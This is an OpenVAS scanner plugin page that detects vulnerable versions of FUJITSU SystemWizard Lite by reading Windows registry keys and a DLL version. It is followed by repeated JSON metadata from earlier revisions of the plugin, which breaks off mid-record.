FUJITSU SystemWizard Lite Multiple Vulnerabilities
2009-01-30T00:00:00
ID OPENVAS:1361412562310900456 Type openvas Reporter Copyright (C) 2009 SecPod Modified 2018-11-30T00:00:00
Description
This host is installed with FUJITSU SystemWizard Lite and is prone
to multiple vulnerabilities.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: secpod_fujitsu_syswizard_lite_mult_vuln.nasl 12602 2018-11-30 14:36:58Z cfischer $
#
# FUJITSU SystemWizard Lite Multiple Vulnerabilities
#
# Authors:
# Sujit Ghosal <sghosal@secpod.com>
#
# Copyright:
# Copyright (c) 2009 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.900456");
script_version("$Revision: 12602 $");
script_tag(name:"last_modification", value:"$Date: 2018-11-30 15:36:58 +0100 (Fri, 30 Nov 2018) $");
script_tag(name:"creation_date", value:"2009-01-30 14:33:42 +0100 (Fri, 30 Jan 2009)");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_cve_id("CVE-2009-0264", "CVE-2009-0270", "CVE-2009-0271");
script_bugtraq_id(33344);
script_name("FUJITSU SystemWizard Lite Multiple Vulnerabilities");
script_xref(name:"URL", value:"http://secunia.com/advisories/33594");
script_xref(name:"URL", value:"http://securityvulns.com/Vdocument198.html");
script_xref(name:"URL", value:"http://www.wintercore.com/advisories/advisory_W010109.html");
script_xref(name:"URL", value:"http://primeserver.fujitsu.com/primequest/products/os/windows2008.html");
script_category(ACT_GATHER_INFO);
script_tag(name:"qod_type", value:"executable_version");
script_copyright("Copyright (C) 2009 SecPod");
script_family("Buffer overflow");
script_dependencies("smb_reg_service_pack.nasl");
script_mandatory_keys("SMB/WindowsVersion");
script_require_ports(139, 445);
script_tag(name:"impact", value:"Successful exploitation will let the attacker execute arbitrary codes via
a large PXE protocol request in a UDP packet and also directory traversal
attack sequences in unspecified vectors.");
script_tag(name:"affected", value:"FUJITSU SystemWizard Lite version 2.0A and prior on Windows.");
script_tag(name:"insight", value:"Improper boundary check of input data in DefaultSkin.ini in TFTP service,
Registry Setting Tool and PXEService.exe files.");
script_tag(name:"solution", value:"Apply the security patches from the linked references.");
script_tag(name:"summary", value:"This host is installed with FUJITSU SystemWizard Lite and is prone
to multiple vulnerabilities.");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("smb_nt.inc");
include("version_func.inc");
include("secpod_smb_func.inc");
if(!get_kb_item("SMB/WindowsVersion")){
exit(0);
}
if(!registry_key_exists(key:"SOFTWARE\FUJITSU")){
exit(0);
}
key = "SOFTWARE\FUJITSU\SystemcastWizard";
fuziVer = registry_get_sz(key:"SOFTWARE\FUJITSU\SystemcastWizard",
item:"ProductVersion");
if(!fuziVer){
exit(0);
}
wizardVer = eregmatch(pattern:"V([0-9.]+A?)", string:fuziVer);
if(wizardVer[1] == NULL){
exit(0);
}
if(version_is_less_equal(version:wizardVer[1], test_version:"1.6A"))
{
security_message( port: 0, data: "The target host was found to be vulnerable" );
exit(0);
}
if(version_is_less_equal(version:wizardVer[1], test_version:"2.0A"))
{
key = "SOFTWARE\FUJITSU\SystemcastWizard";
path = registry_get_sz(key:key, item:"InstallPath");
if(!path){
exit(0);
}
dllPath = path + "bin\ChkPXESv.dll";
share = ereg_replace(pattern:"([A-Z]):.*",replace:"\1$", string:dllPath);
file = ereg_replace(pattern:"[A-Z]:(.*)",replace:"\1", string:dllPath);
dllVer = GetVer(share:share, file:file);
if(!dllVer){
exit(0);
}
if(version_is_less(version:dllVer, test_version:"4.0.11.530")){
security_message( port: 0, data: "The target host was found to be vulnerable" );
}
}
{"id": "OPENVAS:1361412562310900456", "bulletinFamily": "scanner", "title": "FUJITSU SystemWizard Lite Multiple Vulnerabilities", "description": "This host is installed with FUJITSU SystemWizard Lite and is prone\n to multiple vulnerabilities.", "published": "2009-01-30T00:00:00", "modified": "2018-11-30T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900456", "reporter": "Copyright (C) 2009 SecPod", "references": ["http://securityvulns.com/Vdocument198.html", "http://primeserver.fujitsu.com/primequest/products/os/windows2008.html", "http://secunia.com/advisories/33594", "http://www.wintercore.com/advisories/advisory_W010109.html"], "cvelist": ["CVE-2009-0264", "CVE-2009-0270", "CVE-2009-0271"], "type": "openvas", "lastseen": "2019-05-29T18:40:21", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2009-0264", "CVE-2009-0270", "CVE-2009-0271"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This host is installed with FUJITSU SystemWizard Lite and is prone\n to multiple vulnerabilities.", "edition": 4, "enchantments": {"dependencies": {"modified": "2018-11-30T21:33:44", "references": [{"idList": ["SAINT:A87C55E95CFEB548CDC7B23D1FA42B7C", "SAINT:F168A3089838198F30F8EFEB69B427F9", "SAINT:7FD41F00E955757DFA3F58C95540E4FD"], "type": "saint"}, {"idList": ["CVE-2009-0264", "CVE-2009-0270", "CVE-2009-0271"], "type": "cve"}, {"idList": ["OPENVAS:900456"], "type": "openvas"}, {"idList": ["TFTPD_DIR_TRAV.NASL"], "type": "nessus"}, {"idList": ["JVN:05255562"], "type": "jvn"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "9605c0bb8adc44633773c631f77da0b64a51fd2a131e4f739692c284f1fb6921", "hashmap": [{"hash": "924ecd2be4e65f6d229a12b5a34bbd71", "key": "pluginID"}, {"hash": "a021a3692614a7c69055764075908c6f", "key": "reporter"}, {"hash": "06a620fb1ee7ec8fa23a9afed4ac8bb6", "key": "cvelist"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "8f599a7b645c2e9ec39c6f42dccd4188", "key": "modified"}, {"hash": "9f18fb1da60f44d8087d03b5e75cc6bd", "key": "published"}, {"hash": "a1cf95887bb882175596c363cae210d3", "key": "href"}, {"hash": "b9cc6a9f33ec12abd4e976263afc3918", "key": "naslFamily"}, {"hash": "fd3054088fc6a3c6742ed4a35018c354", "key": "description"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "062abf28c7423607c109af2c2c29d4ec", "key": "references"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0f37e6045301dd278211d30650c17e", "key": "sourceData"}, {"hash": "46155588042cb4c8b59ba15f1f7c5a37", "key": "title"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900456", "id": "OPENVAS:1361412562310900456", "lastseen": "2018-11-30T21:33:44", "modified": "2018-11-30T00:00:00", "naslFamily": "Buffer overflow", "objectVersion": "1.3", "pluginID": "1361412562310900456", "published": "2009-01-30T00:00:00", "references": ["http://securityvulns.com/Vdocument198.html", "http://primeserver.fujitsu.com/primequest/products/os/windows2008.html", "http://secunia.com/advisories/33594", "http://www.wintercore.com/advisories/advisory_W010109.html"], "reporter": "Copyright (C) 2009 SecPod", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_fujitsu_syswizard_lite_mult_vuln.nasl 12602 2018-11-30 14:36:58Z cfischer $\n#\n# FUJITSU SystemWizard Lite Multiple Vulnerabilities\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900456\");\n script_version(\"$Revision: 12602 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-30 15:36:58 +0100 (Fri, 30 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-30 14:33:42 +0100 (Fri, 30 Jan 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-0264\", \"CVE-2009-0270\", \"CVE-2009-0271\");\n script_bugtraq_id(33344);\n script_name(\"FUJITSU SystemWizard Lite Multiple Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/33594\");\n script_xref(name:\"URL\", value:\"http://securityvulns.com/Vdocument198.html\");\n script_xref(name:\"URL\", value:\"http://www.wintercore.com/advisories/advisory_W010109.html\");\n script_xref(name:\"URL\", value:\"http://primeserver.fujitsu.com/primequest/products/os/windows2008.html\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the attacker execute arbitrary codes via\n a large PXE protocol request in a UDP packet and also directory traversal\n attack sequences in unspecified vectors.\");\n\n script_tag(name:\"affected\", value:\"FUJITSU SystemWizard Lite version 2.0A and prior on Windows.\");\n\n script_tag(name:\"insight\", value:\"Improper boundary check of input data in DefaultSkin.ini in TFTP service,\n Registry Setting Tool and PXEService.exe files.\");\n\n script_tag(name:\"solution\", value:\"Apply the security patches from the linked references.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with FUJITSU SystemWizard Lite and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nif(!registry_key_exists(key:\"SOFTWARE\\FUJITSU\")){\n exit(0);\n}\n\nkey = \"SOFTWARE\\FUJITSU\\SystemcastWizard\";\nfuziVer = registry_get_sz(key:\"SOFTWARE\\FUJITSU\\SystemcastWizard\",\n item:\"ProductVersion\");\nif(!fuziVer){\n exit(0);\n}\n\nwizardVer = eregmatch(pattern:\"V([0-9.]+A?)\", string:fuziVer);\nif(wizardVer[1] == NULL){\n exit(0);\n}\n\nif(version_is_less_equal(version:wizardVer[1], test_version:\"1.6A\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n\nif(version_is_less_equal(version:wizardVer[1], test_version:\"2.0A\"))\n{\n key = \"SOFTWARE\\FUJITSU\\SystemcastWizard\";\n path = registry_get_sz(key:key, item:\"InstallPath\");\n if(!path){\n exit(0);\n }\n\n dllPath = path + \"bin\\ChkPXESv.dll\";\n share = ereg_replace(pattern:\"([A-Z]):.*\",replace:\"\\1$\", string:dllPath);\n file = ereg_replace(pattern:\"[A-Z]:(.*)\",replace:\"\\1\", string:dllPath);\n\n dllVer = GetVer(share:share, file:file);\n if(!dllVer){\n exit(0);\n }\n\n if(version_is_less(version:dllVer, test_version:\"4.0.11.530\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "title": "FUJITSU SystemWizard Lite Multiple Vulnerabilities", "type": "openvas", "viewCount": 0}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-11-30T21:33:44"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2009-0264", "CVE-2009-0270", "CVE-2009-0271"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This host is installed with FUJITSU SystemWizard Lite and is prone\n to multiple vulnerabilities.", "edition": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "aa55b43a2c149bafee887814dec605c94a4bdc33bf86ec7640c210ceb2f6ad1a", "hashmap": [{"hash": "e20cb56dbd78ffc89acbf2b7d7a5bd23", "key": "sourceData"}, {"hash": "924ecd2be4e65f6d229a12b5a34bbd71", "key": "pluginID"}, {"hash": "a021a3692614a7c69055764075908c6f", "key": "reporter"}, {"hash": "4fb7fd6149697e74d091717ea3f1ca84", "key": "modified"}, {"hash": "06a620fb1ee7ec8fa23a9afed4ac8bb6", "key": "cvelist"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "9f18fb1da60f44d8087d03b5e75cc6bd", "key": "published"}, {"hash": "a1cf95887bb882175596c363cae210d3", "key": "href"}, {"hash": "b9cc6a9f33ec12abd4e976263afc3918", "key": "naslFamily"}, {"hash": "fd3054088fc6a3c6742ed4a35018c354", "key": "description"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "d35ed8fcdf82578ec604d56b0be4fe0c", "key": "references"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "46155588042cb4c8b59ba15f1f7c5a37", "key": "title"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900456", "id": "OPENVAS:1361412562310900456", "lastseen": "2018-04-06T11:39:50", "modified": "2018-04-06T00:00:00", "naslFamily": "Buffer overflow", "objectVersion": "1.3", "pluginID": "1361412562310900456", "published": "2009-01-30T00:00:00", "references": ["http://securityvulns.com/Vdocument198.html", "http://secunia.com/advisories/33594", "http://www.wintercore.com/advisories/advisory_W010109.html"], "reporter": "Copyright (C) 2009 SecPod", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_fujitsu_syswizard_lite_mult_vuln.nasl 9350 2018-04-06 07:03:33Z cfischer $\n#\n# FUJITSU SystemWizard Lite Multiple Vulnerabilities\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let the attacker execute arbitrary codes via\n a large PXE protocol request in a UDP packet and also directory traversal\n attack sequences in unspecified vectors.\n Impact Level: Application\";\ntag_affected = \"FUJITSU SystemWizard Lite version 2.0A and prior on Windows.\";\ntag_insight = \"Improper boundary check of input data in DefaultSkin.ini in TFTP service,\n Registry Setting Tool and PXEService.exe files.\";\ntag_solution = \"Apply the security patches.\n http://primeserver.fujitsu.com/primequest/products/os/windows2008.html\";\ntag_summary = \"This host is installed with FUJITSU SystemWizard Lite and is prone\n to multiple vulnerabilities.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900456\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-30 14:33:42 +0100 (Fri, 30 Jan 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-0264\", \"CVE-2009-0270\", \"CVE-2009-0271\");\n script_bugtraq_id(33344);\n script_name(\"FUJITSU SystemWizard Lite Multiple Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/33594\");\n script_xref(name : \"URL\" , value : \"http://securityvulns.com/Vdocument198.html\");\n script_xref(name : \"URL\" , value : \"http://www.wintercore.com/advisories/advisory_W010109.html\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nif(!registry_key_exists(key:\"SOFTWARE\\FUJITSU\")){\n exit(0);\n}\n\nkey = \"SOFTWARE\\FUJITSU\\SystemcastWizard\";\nfuziVer = registry_get_sz(key:\"SOFTWARE\\FUJITSU\\SystemcastWizard\",\n item:\"ProductVersion\");\nif(!fuziVer){\n exit(0);\n}\n\nwizardVer = eregmatch(pattern:\"V([0-9.]+A?)\", string:fuziVer);\nif(wizardVer[1] == NULL){\n exit(0);\n}\n\n# Check for FUJITSU SystemWizard version 1.6a and prior\nif(version_is_less_equal(version:wizardVer[1], test_version:\"1.6A\"))\n{\n security_message(0);\n exit(0);\n}\n\n# Check for FUJITSU SystemWizard version 1.7 to 2.0A\nif(version_is_less_equal(version:wizardVer[1], test_version:\"2.0A\"))\n{\n key = \"SOFTWARE\\FUJITSU\\SystemcastWizard\";\n path = registry_get_sz(key:key, item:\"InstallPath\");\n if(!path){\n exit(0);\n }\n\n dllPath = path + \"bin\\ChkPXESv.dll\";\n share = ereg_replace(pattern:\"([A-Z]):.*\",replace:\"\\1$\", string:dllPath);\n file = ereg_replace(pattern:\"[A-Z]:(.*)\",replace:\"\\1\", string:dllPath);\n\n dllVer = GetVer(share:share, file:file);\n if(!dllVer){\n exit(0);\n }\n\n # Check for ChkPXESv.dll file version < 4.0.11.530 or prior.\n if(version_is_less(version:dllVer, test_version:\"4.0.11.530\")){\n security_message(0);\n }\n}\n", "title": "FUJITSU SystemWizard Lite Multiple Vulnerabilities", "type": "openvas", "viewCount": 0}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2018-04-06T11:39:50"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2009-0264", "CVE-2009-0270", "CVE-2009-0271"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This host is installed with FUJITSU SystemWizard Lite and is prone\n to multiple vulnerabilities.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "aa55b43a2c149bafee887814dec605c94a4bdc33bf86ec7640c210ceb2f6ad1a", "hashmap": [{"hash": "e20cb56dbd78ffc89acbf2b7d7a5bd23", "key": "sourceData"}, {"hash": "924ecd2be4e65f6d229a12b5a34bbd71", "key": "pluginID"}, {"hash": "a021a3692614a7c69055764075908c6f", "key": "reporter"}, {"hash": "4fb7fd6149697e74d091717ea3f1ca84", "key": "modified"}, {"hash": "06a620fb1ee7ec8fa23a9afed4ac8bb6", "key": "cvelist"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "9f18fb1da60f44d8087d03b5e75cc6bd", "key": "published"}, {"hash": "a1cf95887bb882175596c363cae210d3", "key": "href"}, {"hash": "b9cc6a9f33ec12abd4e976263afc3918", "key": "naslFamily"}, {"hash": "fd3054088fc6a3c6742ed4a35018c354", "key": "description"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "d35ed8fcdf82578ec604d56b0be4fe0c", "key": "references"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "46155588042cb4c8b59ba15f1f7c5a37", "key": "title"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900456", "id": "OPENVAS:1361412562310900456", "lastseen": "2018-09-02T00:05:59", "modified": "2018-04-06T00:00:00", "naslFamily": "Buffer overflow", "objectVersion": "1.3", "pluginID": "1361412562310900456", "published": "2009-01-30T00:00:00", "references": ["http://securityvulns.com/Vdocument198.html", "http://secunia.com/advisories/33594", "http://www.wintercore.com/advisories/advisory_W010109.html"], "reporter": "Copyright (C) 2009 SecPod", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_fujitsu_syswizard_lite_mult_vuln.nasl 9350 2018-04-06 07:03:33Z cfischer $\n#\n# FUJITSU SystemWizard Lite Multiple Vulnerabilities\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let the attacker execute arbitrary codes via\n a large PXE protocol request in a UDP packet and also directory traversal\n attack sequences in unspecified vectors.\n Impact Level: Application\";\ntag_affected = \"FUJITSU SystemWizard Lite version 2.0A and prior on Windows.\";\ntag_insight = \"Improper boundary check of input data in DefaultSkin.ini in TFTP service,\n Registry Setting Tool and PXEService.exe files.\";\ntag_solution = \"Apply the security patches.\n http://primeserver.fujitsu.com/primequest/products/os/windows2008.html\";\ntag_summary = \"This host is installed with FUJITSU SystemWizard Lite and is prone\n to multiple vulnerabilities.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900456\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-30 14:33:42 +0100 (Fri, 30 Jan 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-0264\", \"CVE-2009-0270\", \"CVE-2009-0271\");\n script_bugtraq_id(33344);\n script_name(\"FUJITSU SystemWizard Lite Multiple Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/33594\");\n script_xref(name : \"URL\" , value : \"http://securityvulns.com/Vdocument198.html\");\n script_xref(name : \"URL\" , value : \"http://www.wintercore.com/advisories/advisory_W010109.html\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nif(!registry_key_exists(key:\"SOFTWARE\\FUJITSU\")){\n exit(0);\n}\n\nkey = \"SOFTWARE\\FUJITSU\\SystemcastWizard\";\nfuziVer = registry_get_sz(key:\"SOFTWARE\\FUJITSU\\SystemcastWizard\",\n item:\"ProductVersion\");\nif(!fuziVer){\n exit(0);\n}\n\nwizardVer = eregmatch(pattern:\"V([0-9.]+A?)\", string:fuziVer);\nif(wizardVer[1] == NULL){\n exit(0);\n}\n\n# Check for FUJITSU SystemWizard version 1.6a and prior\nif(version_is_less_equal(version:wizardVer[1], test_version:\"1.6A\"))\n{\n security_message(0);\n exit(0);\n}\n\n# Check for FUJITSU SystemWizard version 1.7 to 2.0A\nif(version_is_less_equal(version:wizardVer[1], test_version:\"2.0A\"))\n{\n key = \"SOFTWARE\\FUJITSU\\SystemcastWizard\";\n path = registry_get_sz(key:key, item:\"InstallPath\");\n if(!path){\n exit(0);\n }\n\n dllPath = path + \"bin\\ChkPXESv.dll\";\n share = ereg_replace(pattern:\"([A-Z]):.*\",replace:\"\\1$\", string:dllPath);\n file = ereg_replace(pattern:\"[A-Z]:(.*)\",replace:\"\\1\", string:dllPath);\n\n dllVer = GetVer(share:share, file:file);\n if(!dllVer){\n exit(0);\n }\n\n # Check for ChkPXESv.dll file version < 4.0.11.530 or prior.\n if(version_is_less(version:dllVer, test_version:\"4.0.11.530\")){\n security_message(0);\n }\n}\n", "title": "FUJITSU SystemWizard Lite Multiple Vulnerabilities", "type": "openvas", "viewCount": 0}, "differentElements": ["references", "modified", "sourceData"], "edition": 3, "lastseen": "2018-09-02T00:05:59"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2009-0264", "CVE-2009-0270", "CVE-2009-0271"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "This host is installed with FUJITSU SystemWizard Lite and is prone\n to multiple vulnerabilities.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "e3a79b8cdf0a175e6946874e56ddbf711f96a35417651bae71ceeb91451f9ab0", "hashmap": [{"hash": "e20cb56dbd78ffc89acbf2b7d7a5bd23", "key": "sourceData"}, {"hash": "924ecd2be4e65f6d229a12b5a34bbd71", "key": "pluginID"}, {"hash": "a021a3692614a7c69055764075908c6f", "key": "reporter"}, {"hash": "4fb7fd6149697e74d091717ea3f1ca84", "key": "modified"}, {"hash": "06a620fb1ee7ec8fa23a9afed4ac8bb6", "key": "cvelist"}, {"hash": "9f18fb1da60f44d8087d03b5e75cc6bd", "key": "published"}, {"hash": "a1cf95887bb882175596c363cae210d3", "key": "href"}, {"hash": "b9cc6a9f33ec12abd4e976263afc3918", "key": "naslFamily"}, {"hash": "fd3054088fc6a3c6742ed4a35018c354", "key": "description"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d35ed8fcdf82578ec604d56b0be4fe0c", "key": "references"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "46155588042cb4c8b59ba15f1f7c5a37", "key": "title"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900456", "id": "OPENVAS:1361412562310900456", "lastseen": "2018-08-30T19:28:17", "modified": "2018-04-06T00:00:00", "naslFamily": "Buffer overflow", "objectVersion": "1.3", "pluginID": "1361412562310900456", "published": "2009-01-30T00:00:00", "references": ["http://securityvulns.com/Vdocument198.html", "http://secunia.com/advisories/33594", "http://www.wintercore.com/advisories/advisory_W010109.html"], "reporter": "Copyright (C) 2009 SecPod", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_fujitsu_syswizard_lite_mult_vuln.nasl 9350 2018-04-06 07:03:33Z cfischer $\n#\n# FUJITSU SystemWizard Lite Multiple Vulnerabilities\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let the attacker execute arbitrary codes via\n a large PXE protocol request in a UDP packet and also directory traversal\n attack sequences in unspecified vectors.\n Impact Level: Application\";\ntag_affected = \"FUJITSU SystemWizard Lite version 2.0A and prior on Windows.\";\ntag_insight = \"Improper boundary check of input data in DefaultSkin.ini in TFTP service,\n Registry Setting Tool and PXEService.exe files.\";\ntag_solution = \"Apply the security patches.\n http://primeserver.fujitsu.com/primequest/products/os/windows2008.html\";\ntag_summary = \"This host is installed with FUJITSU SystemWizard Lite and is prone\n to multiple vulnerabilities.\";\n\nif(description)\n{\n 